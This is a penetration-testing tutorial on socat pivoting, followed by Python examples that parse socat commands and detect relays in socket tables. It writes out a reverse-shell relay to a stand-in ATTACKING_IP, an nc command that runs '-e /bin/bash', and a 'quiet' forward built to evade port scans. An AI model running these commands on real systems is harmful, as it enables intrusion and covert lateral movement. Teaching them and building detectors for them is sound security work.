# Socat

## Overview

**Socat** can be used to create port forwards and relays.

For example, if you are attempting to get a shell on a target that does not have a direct connection back to your attacking computer, you could use **socat** to set up a relay on the currently compromised machine. This listens for the reverse shell from the target and immediately forwards it back to the attacking box.

## Reverse Shell Relay with Socat

First download the **socat** binary ([Linux](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) / [Windows](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download)) to the target machine.

Start an nc listener on your attacking machine on port 1333.

Start the socat relay on the **target machine**:

```bash
./socat tcp-l:8000 tcp:ATTACKING_IP:1333 &
```

* **tcp-l:8000**
  * creates the first half of the connection: an IPv4 listener on TCP port 8000 of the target machine.
* **tcp:ATTACKING_IP:1333**
  * connects back to our local IP on port 1333, where the nc listener is waiting. ATTACKING_IP obviously needs to be filled in correctly for this to work.

From here we can create a new reverse shell back to the attacking machine via the **target's** local port 8000:

```bash
./nc-adot8 127.0.0.1 8000 -e /bin/bash
```

## Port Forwarding - Noisy

You can set up a port forward with socat by opening a listening port on the compromised server and redirecting whatever comes into it to the target server.

For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command on the compromised server.

```bash
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
```

* **fork**
  * puts every accepted connection into a new process, so the listener keeps accepting further connections
* **reuseaddr**
  * makes the port stay open after a connection is made to it

We can now connect to port 33060 on the compromised server (172.16.0.5) and have our traffic **relayed** to our intended target **172.16.0.10:3306.**
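Both the reverse-shell relay above and this port forward are built from the same two socat address forms: `tcp-l:PORT[,opt,...]` listens and `tcp:HOST:PORT[,opt,...]` connects. The following is an added example, not code from the page or from the socat project: a small parser that takes a socat command line as it would appear in `ps` output or EDR process telemetry, labels each side, and names the relay shape it produces. The address-type names and option meanings are socat's; the shape labels and the `classify` helper are this example's own.

```python
"""Describe what a socat command line of the kind shown on this page sets up.
Added example (not socat's own code): parses the two address forms used above,
tcp-l:PORT[,opt,...] (listen) and tcp:HOST:PORT[,opt,...] (connect), labels
each side and names the resulting relay shape."""
import shlex
from dataclasses import dataclass, field

LISTEN_TYPES = {"tcp-l", "tcp-listen", "tcp4-l", "tcp4-listen", "tcp6-l", "tcp6-listen"}
CONNECT_TYPES = {"tcp", "tcp4", "tcp6", "tcp-connect", "tcp4-connect", "tcp6-connect"}

# Meaning of the options this page uses (socat accepts many more).
OPTION_NOTES = {
    "fork": "handle each connection in a child process; parent keeps accepting",
    "reuseaddr": "set SO_REUSEADDR so the port can be re-bound without waiting out TIME_WAIT",
}


@dataclass
class Address:
    kind: str                 # "listen" or "connect"
    host: str                 # bind address (listen) or destination (connect)
    port: str
    options: dict = field(default_factory=dict)

    def describe(self) -> str:
        verb = "listen on" if self.kind == "listen" else "connect to"
        text = f"{verb} {self.host}:{self.port}"
        notes = [f"{k}: {OPTION_NOTES.get(k, 'unrecognised option')}" for k in self.options]
        return text + (f" ({'; '.join(notes)})" if notes else "")


def parse_address(spec: str) -> Address:
    """Split e.g. 'tcp-l:33060,fork,reuseaddr' into type, endpoint and options."""
    head, *opts = spec.split(",")
    atype, _, endpoint = head.partition(":")
    options = {}
    for opt in opts:
        key, sep, value = opt.partition("=")
        options[key] = value if sep else None
    atype = atype.lower()
    if atype in LISTEN_TYPES:
        if not endpoint.isdigit():
            raise ValueError(f"listen address needs a port: {spec}")
        # a bind= option narrows the listener; otherwise socat binds all interfaces
        return Address("listen", options.get("bind", "0.0.0.0"), endpoint, options)
    if atype in CONNECT_TYPES:
        host, sep, port = endpoint.rpartition(":")
        if not sep or not host or not port:
            raise ValueError(f"connect address needs HOST:PORT: {spec}")
        return Address("connect", host, port, options)
    raise ValueError(f"unsupported socat address type: {atype}")


def parse_socat_command(cmdline: str):
    """Return the (left, right) addresses from a socat invocation.  Leading
    socat flags (-d, -v, ...) and a trailing shell '&' are skipped."""
    argv = shlex.split(cmdline)
    if argv and argv[-1] == "&":
        argv.pop()
    addresses = [a for a in argv[1:] if not a.startswith("-")]
    if len(addresses) != 2:
        raise ValueError(f"expected exactly two addresses, got {addresses}")
    return parse_address(addresses[0]), parse_address(addresses[1])


# Labels for the four combinations of sides (this example's own naming).
RELAY_SHAPES = {
    ("listen", "connect"): "inbound port forward / relay",
    ("listen", "listen"): "local relay between two listeners",
    ("connect", "connect"): "outbound double-connect (no listening socket on this host)",
    ("connect", "listen"): "outbound connect bridged to a local listener",
}


def classify(cmdline: str) -> dict:
    """Summarise a socat command line: what each side does, the relay shape,
    and whether it opens a port that a scan of this host would see."""
    left, right = parse_socat_command(cmdline)
    return {
        "left": left.describe(),
        "right": right.describe(),
        "shape": RELAY_SHAPES[(left.kind, right.kind)],
        "exposes_port": left.kind == "listen" or right.kind == "listen",
    }


if __name__ == "__main__":
    for cmd in (
        "./socat tcp-l:8000 tcp:ATTACKING_IP:1333 &",
        "./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &",
        "socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &",
        "./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &",
    ):
        info = classify(cmd)
        print(f"{cmd}\n  {info['shape']}\n  {info['left']} -> {info['right']}")
```

Run on the four command lines from this page, the forward in this section reports as an inbound relay that exposes port 33060, while the connect-connect form used in the quiet method reports `exposes_port` as false, which is exactly why a port scan of the compromised host misses it.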

## Port Forwarding - Quiet

The first method can be picked up by any kind of host or network scanning because it literally opens an externally reachable listening port (not stealthy at all).

First we need to open up ports 8001 and 8000 on our **attacking machine** to create a local port relay. What goes into one of them comes out of the other.

```bash
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```

Next, on the compromised server, we run the following to create a link between port 8000 on our **attacking machine** and port **80** on the **intended target (172.16.0.10)**.

This lets us browse to **localhost:8000** on the attacking machine to load the web page served by the target at **172.16.0.10:80**.

```bash
# template: fill in ATTACKING_IP, TARGET_IP and TARGET_PORT
./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
# the same command with this page's example values
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
```
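The noisy and quiet methods differ in what a defender sees on the compromised host: the first leaves a listening socket behind, the second only outbound connections, so a port scan finds nothing and the evidence lives in the host's socket table or in flow data. The following added example (not part of the page or of socat) runs three checks over constructed lines in the layout of `ss -tnap`: an unexpected listener, a process bridging an accepted connection to an outbound one, and a process holding outbound connections to two different hosts with no listener. The process names, PIDs and the `expected_listeners` allowlist are assumptions; the IP addresses are the ones used on this page.

```python
"""Host-side check for socat-style relays (added example, not socat's own code).
Works over constructed text in the layout of `ss -tnap`:
  State Recv-Q Send-Q Local:Port Peer:Port users:(("name",pid=N,fd=M))
and groups sockets by owning PID to spot the relay shapes described above."""
import re
from collections import defaultdict

SS_RE = re.compile(
    r'^(?P<state>[A-Z-]+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)

# Constructed sample: a normal sshd listener; a forwarder listening on 33060
# whose fork()ed child (pid 4244) bridges a client to 172.16.0.10:3306; and a
# renamed "quiet" forwarder (pid 4301) that only dials out, to 10.50.73.2:8001
# and 172.16.0.10:80.  Names and PIDs are made up for the example.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0      5      0.0.0.0:33060        0.0.0.0:*          users:(("socat",pid=4242,fd=5))
ESTAB  0      0      172.16.0.5:33060     10.50.73.2:40822   users:(("socat",pid=4244,fd=5))
ESTAB  0      0      172.16.0.5:51236     172.16.0.10:3306   users:(("socat",pid=4244,fd=6))
ESTAB  0      0      172.16.0.5:51240     10.50.73.2:8001    users:(("update-agent",pid=4301,fd=3))
ESTAB  0      0      172.16.0.5:51241     172.16.0.10:80     users:(("update-agent",pid=4301,fd=4))
ESTAB  0      0      172.16.0.5:22        10.50.73.2:40100   users:(("sshd",pid=900,fd=4))
"""


def parse_ss(text: str) -> list:
    """Return one dict per socket line; the header and unparseable lines are skipped."""
    socks = []
    for line in text.splitlines():
        m = SS_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["pid"] = int(d["pid"])
            socks.append(d)
    return socks


def host_of(addr: str) -> str:
    return addr.rpartition(":")[0]


def port_of(addr: str) -> str:
    return addr.rpartition(":")[2]


def find_relays(text: str, expected_listeners=frozenset({"sshd"})) -> list:
    """Flag the three relay patterns.  Detection keys on socket shape, not on
    the process name, so renaming the binary does not help the second case."""
    socks = parse_ss(text)
    listen_ports = {port_of(s["local"]) for s in socks if s["state"] == "LISTEN"}
    by_pid = defaultdict(list)
    for s in socks:
        by_pid[s["pid"]].append(s)

    findings = []
    for pid, owned in sorted(by_pid.items()):
        proc = owned[0]["proc"]
        listens = [s for s in owned if s["state"] == "LISTEN"]
        estab = [s for s in owned if s["state"] == "ESTAB"]
        # an ESTAB socket whose local port is a listening port was accept()ed;
        # anything else is a connection this host initiated
        accepted = [s for s in estab if port_of(s["local"]) in listen_ports]
        outbound = [s for s in estab if port_of(s["local"]) not in listen_ports]

        if listens and proc not in expected_listeners:
            findings.append({"pid": pid, "proc": proc, "pattern": "unexpected-listener",
                             "detail": [port_of(s["local"]) for s in listens]})
        if accepted and outbound:  # the noisy forward: client in, target out
            findings.append({"pid": pid, "proc": proc, "pattern": "inbound-relay",
                             "detail": [f'{host_of(a["peer"])} -> {o["peer"]}'
                                        for a in accepted for o in outbound]})
        peers = {host_of(s["peer"]) for s in outbound}
        if not listens and not accepted and len(peers) >= 2:  # the quiet forward
            findings.append({"pid": pid, "proc": proc, "pattern": "double-connect",
                             "detail": sorted(s["peer"] for s in outbound)})
    return findings


if __name__ == "__main__":
    for f in find_relays(SAMPLE_SS):
        print(f"pid {f['pid']} ({f['proc']}): {f['pattern']} {f['detail']}")
```

The double-connect rule is deliberately broad (any legitimate proxy matches it), so in practice it belongs behind an allowlist of known services; its value is that it is the only one of the three that sees the quiet method, which leaves no listening port for a scanner to find.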
